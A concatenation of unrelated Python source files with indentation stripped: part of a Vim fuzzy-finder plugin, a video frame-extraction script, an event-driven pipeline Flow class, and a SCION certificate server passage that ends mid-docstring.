self._preview_open = True
if self._is_content_list:
if self._cli.pattern and (self._index < len(self._content) or len(self._cb_content) > 0):
if self._fuzzy_engine:
step = 60000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content, True, step)
return
if content:
i = -1
for i, line in enumerate(itertools.islice(content, 20)):
self._content.append(line)
if i == -1 and self._read_finished == 0:
self._read_finished = 1
if self._read_finished > 0:
if self._read_finished == 1:
self._read_finished += 1
self._getExplorer().setContent(self._content)
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlRunning(False)
if self._cli.pattern:
self._getInstance().setStlResultsCount(len(self._result_content))
elif self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
if bang:
if self._result_content: # self._result_content is [] only if
# self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] != b'':
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
self._getInstance().appendBuffer(self._content[self._initial_count:])
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
else:
if bang:
if self._getInstance().empty():
self._offset_in_content = len(self._content)
if self._offset_in_content > 0:
self._getInstance().appendBuffer(self._content[:self._offset_in_content])
else:
cur_len = len(self._content)
if cur_len > self._offset_in_content:
self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len])
self._offset_in_content = cur_len
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
else:
self._getInstance().setBuffer(self._content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._content))
if self._getInstance().getWinPos() not in ('popup', 'floatwin'):
lfCmd("redrawstatus")
if self._cli.pattern:
if self._index < len(self._content) or len(self._cb_content) > 0:
if self._fuzzy_engine:
step = 60000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content, True, step)
if bang:
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
cur_len = len(self._content)
if time.time() - self._start_time > 0.1:
self._start_time = time.time()
self._getInstance().setStlTotal(cur_len//self._getUnit())
self._getInstance().setStlRunning(True)
if self._cli.pattern:
self._getInstance().setStlResultsCount(len(self._result_content))
else:
self._getInstance().setStlResultsCount(cur_len)
if self._getInstance().getWinPos() not in ('popup', 'floatwin'):
lfCmd("redrawstatus")
if self._cli.pattern:
if self._index < cur_len or len(self._cb_content) > 0:
if self._fuzzy_engine:
step = 60000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content[:cur_len], True, step)
else:
if bang:
if self._getInstance().empty():
self._offset_in_content = len(self._content)
if self._offset_in_content > 0:
self._getInstance().appendBuffer(self._content[:self._offset_in_content])
else:
cur_len = len(self._content)
if cur_len > self._offset_in_content:
self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len])
self._offset_in_content = cur_len
if self._getInstance().getWinPos() not in ('popup', 'floatwin') \
and time.time() - self._bang_start_time > 0.5:
self._bang_start_time = time.time()
lfCmd("echohl WarningMsg | redraw | echo ' searching %s' | echohl NONE" % ('.' * self._bang_count))
self._bang_count = (self._bang_count + 1) % 9
elif len(self._getInstance().buffer) < min(cur_len, self._initial_count):
self._getInstance().setBuffer(self._content[:self._initial_count])
@modifiableController
def input(self):
self._preview_open = False
self._current_mode = 'INPUT'
self._getInstance().hideMimicCursor()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
if self._getInstance().getWinPos() == 'popup':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')"
% (self._getInstance().getPopupWinId(), 'leaderf#PopupFilter'))
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self.clearSelections()
self._hideHelp()
self._resetHighlights()
if self._cli.pattern: # --input xxx or from normal mode to input mode
if self._index == 0: # --input xxx
self._search(self._content)
elif self._empty_query and self._getExplorer().getStlCategory() in ["File"] \
and "--recall" not in self._arguments:
self._guessSearch(self._content)
for cmd in self._cli.input(self._callback):
cur_len = len(self._content)
cur_content = self._content[:cur_len]
if equal(cmd, '<Update>'):
if self._getInstance().getWinPos() == 'popup':
if self._getInstance()._window_object.cursor[0] > 1:
lfCmd("call win_execute({}, 'norm! gg')".format(self._getInstance().getPopupWinId()))
self._search(cur_content)
elif equal(cmd, '<Shorten>'):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<Mode>'):
self._setStlMode()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._getInstance().setPopupStl(self._current_mode)
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
if self._cli.pattern:
self._search(cur_content)
elif equal(cmd, '<C-K>'):
self._toUp()
self._previewResult(False)
elif equal(cmd, '<C-J>'):
self._toDown()
self._previewResult(False)
elif equal(cmd, '<Up>'):
if self._cli.previousHistory(self._getExplorer().getStlCategory()):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<Down>'):
if self._cli.nextHistory(self._getExplorer().getStlCategory()):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<LeftMouse>'):
if self._leftClick():
break
self._previewResult(False)
elif equal(cmd, '<2-LeftMouse>'):
self._leftClick()
if self.accept() is None:
break
elif equal(cmd, '<CR>'):
if self.accept() is None:
break
elif equal(cmd, '<C-X>'):
if self.accept('h') is None:
break
elif equal(cmd, '<C-]>'):
if self.accept('v') is None:
break
elif equal(cmd, '<C-T>'):
if self.accept('t') is None:
break
elif equal(cmd, '<C-\>'):
actions = ['', 'h', 'v', 't', 'dr']
action_count = len(actions)
selection = int( vim.eval(
'confirm("Action?", "&Edit\n&Split\n&Vsplit\n&Tabnew\n&Drop")' ) ) - 1
if selection < 0 or selection >= action_count:
selection = 0
action = actions[selection]
if self.accept(action) is None:
break
elif equal(cmd, '<Quit>'):
self._cli.writeHistory(self._getExplorer().getStlCategory())
self.quit()
break
elif equal(cmd, '<Tab>'): # switch to Normal mode
self._current_mode = 'NORMAL'
if self._getInstance().getWinPos() == 'popup':
if lfEval("exists('*leaderf#%s#NormalModeFilter')" % self._getExplorer().getStlCategory()) == '1':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')" % (self._getInstance().getPopupWinId(),
'leaderf#%s#NormalModeFilter' % self._getExplorer().getStlCategory()))
else:
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#NormalModeFilter', [%d]))"
% (self._getInstance().getPopupWinId(), id(self)))
self._setResultContent()
self.clearSelections()
self._cli.hideCursor()
self._createHelpHint()
self._resetHighlights()
if self._getInstance().isReverseOrder() and self._cli.pattern \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
break
elif equal(cmd, '<F5>'):
self.refresh(False)
elif equal(cmd, '<C-LeftMouse>') or equal(cmd, '<C-S>'):
if self._getExplorer().supportsMulti():
self.addSelections()
elif equal(cmd, '<S-LeftMouse>'):
if self._getExplorer().supportsMulti():
self.selectMulti()
elif equal(cmd, '<C-A>'):
if self._getExplorer().supportsMulti():
self.selectAll()
elif equal(cmd, '<C-L>'):
self.clearSelections()
elif equal(cmd, '<C-P>'):
self._ctrlp_pressed = True
self._previewResult(True)
self._ctrlp_pressed = False
elif equal(cmd, '<PageUp>'):
self._pageUp()
self._previewResult(False)
elif equal(cmd, '<PageDown>'):
self._pageDown()
self._previewResult(False)
elif equal(cmd, '<C-Up>'):
self._toUpInPopup()
elif equal(cmd, '<C-Down>'):
self._toDownInPopup()
else:
if self._cmdExtension(cmd):
break
# vim: set ts=4 sw=4 tw=0 et :
|
vid2img_sthv2.py
|
# -*- coding: utf-8 -*-
# @Author: KunchangLi
# @Date: 2020-02-26 13:10:59
# @LastEditor: KunchangLi
# @LastEditTime: 2020-02-26 13:11:00
# Code for "TSM: Temporal Shift Module for Efficient Video Understanding"
# arXiv:1811.08383
# Ji Lin*, Chuang Gan, Song Han
# {jilin, songhan}@mit.edu, ganchuang@csail.mit.edu
import os
import threading
NUM_THREADS = 100
VIDEO_ROOT = '/ssd/video/something/v2/20bn-something-something-v2' # Downloaded webm videos
FRAME_ROOT = '/ssd/video/something/v2/20bn-something-something-v2-frames' # Directory for extracted frames
def split(l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def extract(video, tmpl='%06d.jpg'):
# os.system(f'ffmpeg -i {VIDEO_ROOT}/{video} -vf -threads 1 -vf scale=-1:256 -q:v 0 '
# f'{FRAME_ROOT}/{video[:-5]}/{tmpl}')
cmd = 'ffmpeg -i \"{}/{}\" -threads 1 -vf scale=-1:256 -q:v 0 \"{}/{}/%06d.jpg\"'.format(VIDEO_ROOT, video, FRAME_ROOT, video[:-5])
os.system(cmd)
def target(video_list):
for video in video_list:
os.makedirs(os.path.join(FRAME_ROOT, video[:-5]))
extract(video)
if __name__ == '__main__':
if not os.path.exists(VIDEO_ROOT):
raise ValueError('Please download videos and set VIDEO_ROOT variable.')
if not os.path.exists(FRAME_ROOT):
os.makedirs(FRAME_ROOT)
video_list = os.listdir(VIDEO_ROOT)
splits = list(split(video_list, NUM_THREADS))
threads = []
for i, split in enumerate(splits):
thread = threading.Thread(target=target, args=(split,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
|
flow.py
|
from typing import List
from logging import Logger
from multiprocessing import Process
from pipert2.core.base.routine import Routine
from pipert2.core.handlers import EventHandler
from pipert2.core.managers.event_board import EventBoard
from pipert2.utils.method_data import Method
from pipert2.utils.annotations import class_functions_dictionary
from pipert2.utils.consts.event_names import START_EVENT_NAME, STOP_EVENT_NAME, KILL_EVENT_NAME
from pipert2.utils.interfaces.event_executor_interface import EventExecutorInterface
from pipert2.utils.dummy_object import Dummy
class Flow(EventExecutorInterface):
"""Flow is an entity designed for running a group of routines in a single process.
It is also responsible to notify his routines when an event is triggered.
"""
events = class_functions_dictionary()
def __init__(self, name: str, event_board: EventBoard, logger: Logger, routines: List[Routine]):
"""
Args:
name (str): Name of the flow.
event_board (EventBoard): The EventBoard of the pipe.
logger (Logger): Logger object for logging the flow actions.
routines (Routine): The routines that will be in the flow.
Attributes:
routines (dict[str, Routine]): Dictionary mapping the routines to their name.
name (str): Name of the flow.
logger (Logger): Logger object for logging the flow actions.
event_handler (EventHandler): EventHandler object for communicating with the
event system of the pipe.
"""
self.routines = {}
self.name = name
self._logger = logger
self.flow_process = Dummy()
flow_events_to_listen = set(self.get_events().keys())
for routine in routines:
routine.set_logger(logger=logger.getChild(routine.name))
routine.flow_name = self.name
flow_events_to_listen.update(routine.get_events().keys())
self.routines[routine.name] = routine
self.event_handler: EventHandler = event_board.get_event_handler(flow_events_to_listen)
def build(self) -> None:
"""Start the flow process.
"""
self.flow_process = Process(target=self.run)
self.flow_process.start()
def run(self) -> None:
"""The flow process, executing the pipe events that occur.
"""
event: Method = self.event_handler.wait()
while event.event_name != KILL_EVENT_NAME:
self.execute_event(event)
event = self.event_handler.wait()
self.execute_event(Method(STOP_EVENT_NAME))
for routine in self.routines.values():
routine.join()
@events(START_EVENT_NAME)
def start(self):
self._logger.plog("Starting")
@events(STOP_EVENT_NAME)
def stop(self):
self._logger.plog("Stopping")
def execute_event(self, event: Method) -> None:
"""Execute the event callbacks in the flow and its routines.
Args:
event: The event to be executed.
"""
if event.is_applied_on_flow(self.name):
if event.is_applied_on_specific_routines(self.name):
routines = event.specific_flow_routines.get(self.name)
for routine in routines:
if routine in self.routines.keys():
self.routines.get(routine).execute_event(event)
else:
for routine in self.routines.values():
routine.execute_event(event)
EventExecutorInterface.execute_event(self, event)
def join(self) -> None:
"""Block until the flow process terminates
"""
self.flow_process.join()
@classmethod
def get_events(cls):
"""Get the events of the flow.
Returns:
dict[str, set[Callback]]: The events callbacks mapped by their events.
"""
return cls.events.all[cls.__name__]
|
main.py
|
#!/usr/bin/python3
# Copyright 2014 ETH Zurich
# Copyright 2018 ETH Zurich, Anapaya Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`base` --- SCION certificate server
========================================
"""
# Stdlib
import datetime
import logging
import threading
# External packages
from nacl.exceptions import CryptoError
from prometheus_client import Counter, Gauge
# SCION
from external.expiring_dict import ExpiringDict
from lib.crypto.asymcrypto import get_enc_key, get_sig_key
from lib.crypto.certificate_chain import CertificateChain, verify_sig_chain_trc
from lib.crypto.trc import TRC
from lib.crypto.symcrypto import crypto_hash
from lib.crypto.symcrypto import kdf
from lib.crypto.util import get_master_key, MASTER_KEY_0
from lib.defines import GEN_CACHE_PATH
from lib.drkey.drkey_mgmt import (
DRKeyMgmt,
DRKeyReply,
DRKeyRequest,
)
from lib.drkey.suite import (
decrypt_drkey,
drkey_signing_input_req,
get_drkey_reply,
get_drkey_request,
get_signing_input_rep,
)
from lib.drkey.types import DRKeySecretValue, FirstOrderDRKey
from lib.drkey.util import drkey_time, get_drkey_exp_time
from lib.errors import SCIONVerificationError
from lib.main import main_default, main_wrapper
from lib.packet.cert_mgmt import (
CertMgmt,
CertChainReply,
CertChainRequest,
TRCReply,
TRCRequest,
)
from lib.packet.ctrl_pld import CtrlPayload, mk_ctrl_req_id
from lib.packet.svc import SVCType
from lib.requests import RequestHandler
from lib.thread import thread_safety_net
from lib.types import (
CertMgmtType,
DRKeyMgmtType,
PayloadClass,
ServiceType
)
from lib.util import (
SCIONTime,
sleep_interval,
)
from lib.zk.cache import ZkSharedCache
from lib.zk.errors import ZkNoConnection
from lib.zk.id import ZkID
from lib.zk.zk import ZK_LOCK_SUCCESS, Zookeeper
from scion_elem.scion_elem import SCIONElement
# Exported metrics.
REQS_TOTAL = Counter("cs_requests_total", "# of total requests", ["server_id", "isd_as", "type"])
IS_MASTER = Gauge("cs_is_master", "true if this process is the replication master",
["server_id", "isd_as"])
# Max amount of DRKey secret values. 1 current, 1 prefetch, 1 buffer.
DRKEY_MAX_SV = 3
# Max TTL of first order DRKey. 1 Day prefetch, 1 Day current.
DRKEY_MAX_TTL = datetime.timedelta(days=2).total_seconds()
# Max number of stored first order DRKeys
DRKEY_MAX_KEYS = 10**6
# Timeout for first order DRKey requests
DRKEY_REQUEST_TIMEOUT = 5
class CertServer(SCIONElement):
"""
The SCION Certificate Server.
"""
SERVICE_TYPE = ServiceType.CS
# ZK path for incoming cert chains
ZK_CC_CACHE_PATH = "cert_chain_cache"
# ZK path for incoming TRCs
ZK_TRC_CACHE_PATH = "trc_cache"
ZK_DRKEY_PATH = "drkey_cache"
def __init__(self, server_id, conf_dir, spki_cache_dir=GEN_CACHE_PATH,
prom_export=None, sciond_path=None):
"""
:param str server_id: server identifier.
:param str conf_dir: configuration directory.
:param str prom_export: prometheus export address.
:param str sciond_path: path to sciond socket.
"""
super().__init__(server_id, conf_dir, spki_cache_dir=spki_cache_dir,
prom_export=prom_export, sciond_path=sciond_path)
self.config = self._load_as_conf()
cc_labels = {**self._labels, "type": "cc"} if self._labels else None
trc_labels = {**self._labels, "type": "trc"} if self._labels else None
drkey_labels = {**self._labels, "type": "drkey"} if self._labels else None
self.cc_requests = RequestHandler.start(
"CC Requests", self._check_cc, self._fetch_cc, self._reply_cc,
labels=cc_labels,
)
self.trc_requests = RequestHandler.start(
"TRC Requests", self._check_trc, self._fetch_trc, self._reply_trc,
labels=trc_labels,
)
self.drkey_protocol_requests = RequestHandler.start(
"DRKey Requests", self._check_drkey, self._fetch_drkey, self._reply_proto_drkey,
labels=drkey_labels,
)
self.CTRL_PLD_CLASS_MAP = {
PayloadClass.CERT: {
CertMgmtType.CERT_CHAIN_REQ: self.process_cert_chain_request,
CertMgmtType.CERT_CHAIN_REPLY: self.process_cert_chain_reply,
CertMgmtType.TRC_REQ: self.process_trc_request,
CertMgmtType.TRC_REPLY: self.process_trc_reply,
},
PayloadClass.DRKEY: {
DRKeyMgmtType.FIRST_ORDER_REQUEST:
self.process_drkey_request,
DRKeyMgmtType.FIRST_ORDER_REPLY:
self.process_drkey_reply,
},
}
zkid = ZkID.from_values(self.addr.isd_as, self.id,
[(self.addr.host, self._port)]).pack()
self.zk = Zookeeper(self.topology.isd_as, self.SERVICE_TYPE,
zkid, self.topology.zookeepers)
self.zk.retry("Joining party", self.zk.party_setup)
self.trc_cache = ZkSharedCache(self.zk, self.ZK_TRC_CACHE_PATH,
self._cached_trcs_handler)
self.cc_cache = ZkSharedCache(self.zk, self.ZK_CC_CACHE_PATH,
self._cached_certs_handler)
self.drkey_cache = ZkSharedCache(self.zk, self.ZK_DRKEY_PATH,
self._cached_drkeys_handler)
self.master_key = get_master_key(self.conf_dir, MASTER_KEY_0)
self.signing_key = get_sig_key(self.conf_dir)
self.private_key = get_enc_key(self.conf_dir)
self.drkey_secrets = ExpiringDict(DRKEY_MAX_SV, DRKEY_MAX_TTL)
self.first_order_drkeys = ExpiringDict(DRKEY_MAX_KEYS, DRKEY_MAX_TTL)
def worker(self):
"""
Worker thread that takes care of reading shared entries from ZK, and
handling master election.
"""
worker_cycle = 1.0
start = SCIONTime.get_time()
while self.run_flag.is_set():
sleep_interval(start, worker_cycle, "CS.worker cycle",
self._quiet_startup())
start = SCIONTime.get_time()
# Update IS_MASTER metric.
if self._labels:
IS_MASTER.labels(**self._labels).set(int(self.zk.have_lock()))
try:
self.zk.wait_connected()
self.trc_cache.process()
self.cc_cache.process()
self.drkey_cache.process()
# Try to become a master.
ret = self.zk.get_lock(lock_timeout=0, conn_timeout=0)
if ret: # Either got the lock, or already had it.
if ret == ZK_LOCK_SUCCESS:
logging.info("Became master")
self.trc_cache.expire(worker_cycle * 10)
self.cc_cache.expire(worker_cycle * 10)
self.drkey_cache.expire(worker_cycle * 10)
except ZkNoConnection:
logging.warning('worker(): ZkNoConnection')
pass
def _cached_trcs_handler(self, raw_entries):
"""
Handles cached (through ZK) TRCs, passed as a list.
"""
for raw in raw_entries:
trc = TRC.from_raw(raw.decode('utf-8'))
rep = CtrlPayload(CertMgmt(TRCReply.from_values(trc)))
self.process_trc_reply(rep, None, from_zk=True)
if len(raw_entries) > 0:
logging.debug("Processed %s trcs from ZK", len(raw_entries))
def _cached_certs_handler(self, raw_entries):
"""
Handles cached (through ZK) chains, passed as a list.
"""
for raw in raw_entries:
cert = CertificateChain.from_raw(raw.decode('utf-8'))
rep = CtrlPayload(CertMgmt(CertChainReply.from_values(cert)))
self.process_cert_chain_reply(rep, None, from_zk=True)
if len(raw_entries) > 0:
logging.debug("Processed %s certs from ZK", len(raw_entries))
def _cached_drkeys_handler(self, raw_entries):
for raw in raw_entries:
msg = CtrlPayload(DRKeyMgmt(DRKeyReply.from_raw(raw)))
self.process_drkey_reply(msg, None, from_zk=True)
def _share_object(self, pld, is_trc):
"""
Share path segments (via ZK) with other path servers.
"""
pld_packed = pld.pack()
pld_hash = crypto_hash(pld_packed).hex()
try:
if is_trc:
self.trc_cache.store("%s-%s" % (pld_hash, SCIONTime.get_time()),
pld_packed)
else:
self.cc_cache.store("%s-%s" % (pld_hash, SCIONTime.get_time()),
pld_packed)
except ZkNoConnection:
logging.warning("Unable to store %s in shared path: "
"no connection to ZK" % "TRC" if is_trc else "CC")
return
logging.debug("%s stored in ZK: %s" % ("TRC" if is_trc else "CC",
pld_hash))
def process_cert_chain_request(self, cpld, meta):
"""Process a certificate chain request."""
cmgt = cpld.union
req = cmgt.union
assert isinstance(req, CertChainRequest), type(req)
key = req.isd_as(), req.p.version
logging.info("Cert chain request received for %sv%s from %s", *key, meta)
REQS_TOTAL.labels(**self._labels, type="cc").inc()
local = meta.ia == self.addr.isd_as
if not self._check_cc(key):
if not local:
logging.warning(
"Dropping CC request from %s for %sv%s: "
"CC not found && requester is not local)",
meta, *key)
else:
self.cc_requests.put((key, (meta, req, cpld.req_id)))
return
self._reply_cc(key, (meta, req, cpld.req_id))
def process_cert_chain_reply(self, cpld, meta, from_zk=False):
"""Process a certificate chain reply."""
cmgt = cpld.union
rep = cmgt.union
assert isinstance(rep, CertChainReply), type(rep)
ia_ver = rep.chain.get_leaf_isd_as_ver()
logging.info("Cert chain reply received for %sv%s (ZK: %s)" %
(ia_ver[0], ia_ver[1], from_zk))
self.trust_store.add_cert(rep.chain)
if not from_zk:
self._share_object(rep.chain, is_trc=False)
# Reply to all requests for this certificate chain
self.cc_requests.put((ia_ver, None))
# If the new version is the max version also reply to NEWEST_VERSION requests.
max_ver = self.trust_store.get_cert(ia_ver[0]).get_leaf_isd_as_ver()[1]
if max_ver == ia_ver[1]:
ia_ver0 = (ia_ver[0], CertChainRequest.NEWEST_VERSION)
self.cc_requests.put((ia_ver0, None))
def _check_cc(self, key):
isd_as, ver = key
cert_chain = self.trust_store.get_cert(isd_as, ver)
if cert_chain:
return True
logging.debug('Cert chain not found for %sv%s', *key)
return False
def _fetch_cc(self, key, req_info):
# Do not attempt to fetch the CertChain from a remote AS if the cacheOnly flag is set.
_, orig_req, _ = req_info
if orig_req.p.cacheOnly:
return
self._send_cc_request(*key)
def _send_cc_request(self, isd_as, ver):
req = CertChainRequest.from_values(isd_as, ver, cache_only=True)
path_meta = self._get_path_via_sciond(isd_as)
if path_meta:
meta = self._build_meta(isd_as, host=SVCType.CS_A, path=path_meta.fwd_path())
req_id = mk_ctrl_req_id()
self.send_meta(CtrlPayload(CertMgmt(req), req_id=req_id), meta)
logging.info("Cert chain request sent to %s via [%s]: %s [id: %016x]",
meta, path_meta.short_desc(), req.short_desc(), req_id)
else:
logging.warning("Cert chain request (for %s) not sent: "
"no path found", req.short_desc())
def _reply_cc(self, key, req_info):
isd_as, ver = key
meta = req_info[0]
req_id = req_info[2]
cert_chain = self.trust_store.get_cert(isd_as, ver)
self.send_meta(
CtrlPayload(CertMgmt(CertChainReply.from_values(cert_chain)), req_id=req_id), meta)
logging.info("Cert chain for %sv%s sent to %s [id: %016x]", isd_as, ver, meta, req_id)
def process_trc_request(self, cpld, meta):
"""Process a TRC request."""
cmgt = cpld.union
req = cmgt.union
assert isinstance(req, TRCRequest), type(req)
key = req.isd_as()[0], req.p.version
logging.info("TRC request received for %sv%s from %s [id: %s]",
*key, meta, cpld.req_id_str())
REQS_TOTAL.labels(**self._labels, type="trc").inc()
local = meta.ia == self.addr.isd_as
if not self._check_trc(key):
if not local:
logging.warning(
"Dropping TRC request from %s for %sv%s: "
"TRC not found && requester is not local)",
meta, *key)
else:
self.trc_requests.put((key, (meta, req, cpld.req_id)))
return
self._reply_trc(key, (meta, req, cpld.req_id))
def process_trc_reply(self, cpld, meta, from_zk=False):
"""
Process a TRC reply.
:param trc_rep: TRC reply.
:type trc_rep: TRCReply
"""
cmgt = cpld.union
trc_rep = cmgt.union
assert isinstance(trc_rep, TRCReply), type(trc_rep)
isd, ver = trc_rep.trc.get_isd_ver()
logging.info("TRCReply received for ISD %sv%s, ZK: %s [id: %s]",
isd, ver, from_zk, cpld.req_id_str())
self.trust_store.add_trc(trc_rep.trc)
if not from_zk:
self._share_object(trc_rep.trc, is_trc=True)
# Reply to all requests for this TRC
self.trc_requests.put(((isd, ver), None))
# If the new version is the max version also reply to NEWEST_VERSION requests.
max_ver = self.trust_store.get_trc(isd).get_isd_ver()[1]
if max_ver == ver:
self.trc_requests.put(((isd, TRCRequest.NEWEST_VERSION), None))
def _check_trc(self, key):
isd, ver = key
ver = None if ver == TRCRequest.NEWEST_VERSION else ver
trc = self.trust_store.get_trc(isd, ver)
if trc:
return True
logging.debug('TRC not found for %sv%s', *key)
return False
def _fetch_trc(self, key, req_info):
# Do not attempt to fetch the TRC from a remote AS if the cacheOnly flag is set.
_, orig_req, _ = req_info
if orig_req.p.cacheOnly:
return
self._send_trc_request(*key)
def _send_trc_request(self, isd, ver):
trc_req = TRCRequest.from_values(isd, ver, cache_only=True)
path_meta = self._get_path_via_sciond(trc_req.isd_as())
if path_meta:
meta = self._build_meta(
path_meta.dst_ia(), host=SVCType.CS_A, path=path_meta.fwd_path())
req_id = mk_ctrl_req_id()
self.send_meta(CtrlPayload(CertMgmt(trc_req), req_id=req_id), meta)
logging.info("TRC request sent to %s via [%s]: %s [id: %016x]",
meta, path_meta.short_desc(), trc_req.short_desc(), req_id)
else:
logging.warning("TRC request not sent for %s: no path found.", trc_req.short_desc())
def _reply_trc(self, key, req_info):
isd, ver = key
ver = None if ver == TRCRequest.NEWEST_VERSION else ver
meta = req_info[0]
req_id = req_info[2]
trc = self.trust_store.get_trc(isd, ver)
self.send_meta(CtrlPayload(CertMgmt(TRCReply.from_values(trc)), req_id=req_id), meta)
logging.info("TRC for %sv%s sent to %s [id: %016x]", isd, ver, meta, req_id)
def process_drkey_request(self, cpld, meta):
"""
Process first order DRKey requests from other ASes.
:param DRKeyRequest req: the DRKey request
:param UDPMetadata meta: the metadata
"""
dpld = cpld.union
req = dpld.union
assert isinstance(req, DRKeyRequest), type(req)
logging.info("DRKeyRequest received from %s: %s [id: %s]",
meta, req.short_desc(), cpld.req_id_str())
REQS_TOTAL.labels(**self._labels, type="drkey").inc()
try:
cert = self._verify_drkey_request(req, meta)
except SCIONVerificationError as e:
logging.warning("Invalid DRKeyRequest from %s. Reason %s: %s", meta, e,
req.short_desc())
return
sv = self._get_drkey_secret(get_drkey_exp_time(req.p.flags.prefetch))
cert_version = self.trust_store.get_cert(self.addr.isd_as).certs[0].version
trc_version = self.trust_store.get_trc(self.addr.isd_as[0]).version
rep = get_drkey_reply(sv, self.addr.isd_as, meta.ia, self.private_key,
self.signing_key, cert_version, cert, trc_version)
self.send_meta(CtrlPayload(DRKeyMgmt(rep), req_id=cpld.req_id), meta)
logging.info("DRKeyReply sent to %s: %s [id: %s]",
meta, req.short_desc(), cpld.req_id_str())
def _verify_drkey_request(self, req, meta):
"""
Verify that the first order DRKey request is legit.
I.e. the signature is valid, the correct ISD AS is queried, timestamp is recent.
:param DRKeyRequest req: the first order DRKey request.
:param UDPMetadata meta: the metadata.
:returns Certificate of the requester.
:rtype: Certificate
:raises: SCIONVerificationError
"""
if self.addr.isd_as != req.isd_as:
raise SCIONVerificationError("Request for other ISD-AS: %s" % req.isd_as)
if drkey_time() - req.p.timestamp > DRKEY_REQUEST_TIMEOUT:
raise SCIONVerificationError("Expired request from %s. %ss old. Max %ss" % (
meta.ia, drkey_time() - req.p.timestamp, DRKEY_REQUEST_TIMEOUT))
trc = self.trust_store.get_trc(meta.ia[0])
chain = self.trust_store.get_cert(meta.ia, req.p.certVer)
err = []
if not chain:
self._send_cc_request(meta.ia, req.p.certVer)
err.append("Certificate not present for %s(v: %s)" % (meta.ia, req.p.certVer))
if not trc:
self._send_trc_request(meta.ia[0], req.p.trcVer)
err.append("TRC not present for %s(v: %s)" % (meta.ia[0], req.p.trcVer))
if err:
raise SCIONVerificationError(", ".join(err))
raw = drkey_signing_input_req(req.isd_as, req.p.flags.prefetch, req.p.timestamp)
try:
verify_sig_chain_trc(raw, req.p.signature, meta.ia, chain, trc)
except SCIONVerificationError as e:
raise SCIONVerificationError(str(e))
return chain.certs[0]
def process_drkey_reply(self, cpld, meta, from_zk=False):
"""
Process first order DRKey reply from other ASes.
:param DRKeyReply rep: the received DRKey reply
:param UDPMetadata meta: the metadata
:param Bool from_zk: if the reply has been received from Zookeeper
"""
dpld = cpld.union
rep = dpld.union
assert isinstance(rep, DRKeyReply), type(rep)
logging.info("DRKeyReply received from %s: %s [id: %s]",
meta, rep.short_desc(), cpld.req_id_str())
src = meta or "ZK"
try:
cert = self._verify_drkey_reply(rep, meta)
raw = decrypt_drkey(rep.p.cipher, self.private_key, cert.subject_enc_key_raw)
except SCIONVerificationError as e:
logging.info("Invalid DRKeyReply from %s. Reason %s: %s", src, e, rep.short_desc())
return
except CryptoError as e:
logging.info("Unable to decrypt DRKeyReply from %s. Reason %s: %s", src, e,
rep.short_desc())
return
drkey = FirstOrderDRKey(rep.isd_as, self.addr.isd_as, rep.p.expTime, raw)
self.first_order_drkeys[drkey] = drkey
if not from_zk:
pld_packed = rep.copy().pack()
try:
self.drkey_cache.store("%s-%s" % (rep.isd_as, rep.p.expTime),
pld_packed)
except ZkNoConnection:
logging.warning("Unable to store DRKey for %s in shared path: "
"no connection to ZK" % rep.isd_as)
return
self.drkey_protocol_requests.put((drkey, None))
def _verify_drkey_reply(self, rep, meta):
"""
Verify that the first order DRKey reply is legit.
I.e. the signature matches, timestamp is recent.
:param DRKeyReply rep: the first order DRKey reply.
:param UDPMetadata meta: the metadata.
:returns Certificate of the responder.
:rtype: Certificate
:raises: SCIONVerificationError
"""
